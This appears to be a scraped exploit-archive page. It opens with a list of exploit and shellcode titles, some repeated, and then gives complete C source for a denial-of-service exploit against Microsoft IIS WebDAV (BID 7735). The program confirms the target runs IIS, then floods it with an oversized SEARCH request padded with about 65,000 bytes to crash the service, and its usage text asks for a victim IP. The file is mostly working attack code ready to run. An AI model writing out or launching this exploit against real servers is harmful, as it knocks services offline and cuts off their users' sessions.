
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
174 lines
No EOL
3.8 KiB
C
174 lines
No EOL
3.8 KiB
C
/*
|
|
source: https://www.securityfocus.com/bid/7735/info
|
|
|
|
Microsoft Internet Information Services has been reported vulnerable to a denial of service.
|
|
|
|
When WebDAV receives excessively long requests to the 'PROPFIND' or 'SEARCH' variables, the IIS service will fail. All current web, FTP, and email sessions will be terminated.
|
|
|
|
IIS will automatically restart and normal service will resume.
|
|
|
|
** It has been reported that if a WebDAV request with a certain number of bytes is received, the Inetinfo service will remain alive but cease serving requests. This will cause the IIS server to stop serving requests until the service is manually restarted.
|
|
*/
|
|
|
|
/*
|
|
IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+
|
|
Bid: 7735
|
|
*/
|
|
|
|
#define ERROR -1
|
|
#define OK 1
|
|
|
|
#ifdef HAVE_CONFIG_H
|
|
#include <config.h>
|
|
#endif
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
#include <string.h>
|
|
|
|
int check_for_iis();
|
|
void screw_iis();
|
|
void usage();
|
|
|
|
char IP[15];
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
/* cout << "Hello, World!" << endl; */
|
|
|
|
if(argc !=2)
|
|
{
|
|
usage(); exit(0);
|
|
}
|
|
|
|
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
|
|
|
|
strcpy(IP, argv[1]);
|
|
|
|
if(check_for_iis() != OK)
|
|
{
|
|
printf("Sorry, BAD LUCK! \n"); exit(0);
|
|
}
|
|
|
|
screw_iis();
|
|
|
|
return EXIT_SUCCESS;
|
|
}
|
|
|
|
int check_for_iis()
|
|
{
|
|
int sck, flag = 1;
|
|
struct sockaddr_in sin;
|
|
char req[50];
|
|
|
|
sck = socket(AF_INET, SOCK_STREAM, 0);
|
|
if(sck == ERROR)
|
|
{
|
|
perror("Socket error "); exit(0);
|
|
}
|
|
|
|
sin.sin_port = htons(80);
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_addr.s_addr = inet_addr(IP);
|
|
|
|
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
|
|
{
|
|
perror("Connect Error "); exit(0);
|
|
}
|
|
|
|
strcpy(req, "GET / HTTP/1.0\r\n\n");
|
|
send(sck, req, sizeof(req), 0);
|
|
recv(sck, req, sizeof(req), 0);
|
|
|
|
if (strstr(req,"IIS") == NULL)
|
|
{
|
|
printf(" Not an IIS server! \n");
|
|
flag = 0;
|
|
}
|
|
|
|
sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
|
|
send(sck, req, sizeof(req), 0);
|
|
recv(sck, req, sizeof(req), 0);
|
|
|
|
if (strstr(req,"HTTP/1.1 411 Length Required") == NULL)
|
|
{
|
|
printf("METHOD SEARCH NOT ALLOWED. \n");
|
|
flag = 0;
|
|
}
|
|
|
|
return(flag);
|
|
}
|
|
|
|
|
|
|
|
void screw_iis()
|
|
{
|
|
int sck, flag = 1;
|
|
struct sockaddr_in sin;
|
|
char junk[100];
|
|
char buffer[65535] ="";
|
|
char request[80000];
|
|
char content[] =
|
|
"<?xml version=\"1.0\"?>\r\n"
|
|
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
|
|
"<g:sql>\r\n"
|
|
"Select \"DAV:displayname\" from scope()\r\n"
|
|
"</g:sql>\r\n"
|
|
"</g:searchrequest>\r\n";
|
|
|
|
|
|
sck = socket(AF_INET, SOCK_STREAM, 0);
|
|
if(sck == ERROR)
|
|
{
|
|
perror("Socket error "); exit(0);
|
|
}
|
|
|
|
sin.sin_port = htons(80);
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_addr.s_addr = inet_addr(IP);
|
|
|
|
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
|
|
{
|
|
perror("Connect Error "); exit(0);
|
|
}
|
|
|
|
buffer[sizeof(buffer)]=0x00;
|
|
|
|
memset(buffer,'S',sizeof(buffer));
|
|
memset(request,0,sizeof(request));
|
|
memset(junk,0,sizeof(junk));
|
|
|
|
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon
|
|
tent-Length: ",buffer,IP);
|
|
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
|
|
|
|
printf("\r\nScrewing the server... \n");
|
|
|
|
send(sck,request,strlen(request),0);
|
|
|
|
send(sck,content,strlen(content),0);
|
|
|
|
recv(sck,junk,sizeof(junk),0);
|
|
|
|
if(junk[0]==0x00)
|
|
{
|
|
printf("Server is Screwed! \r\n");
|
|
}
|
|
else
|
|
{
|
|
printf("BAD LUCK. Patched.\n");
|
|
}
|
|
}
|
|
|
|
|
|
|
|
void usage()
|
|
{
|
|
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
|
|
printf("Usage\r\n");
|
|
printf("Screw_IIS <victim IP>\n");
|
|
} |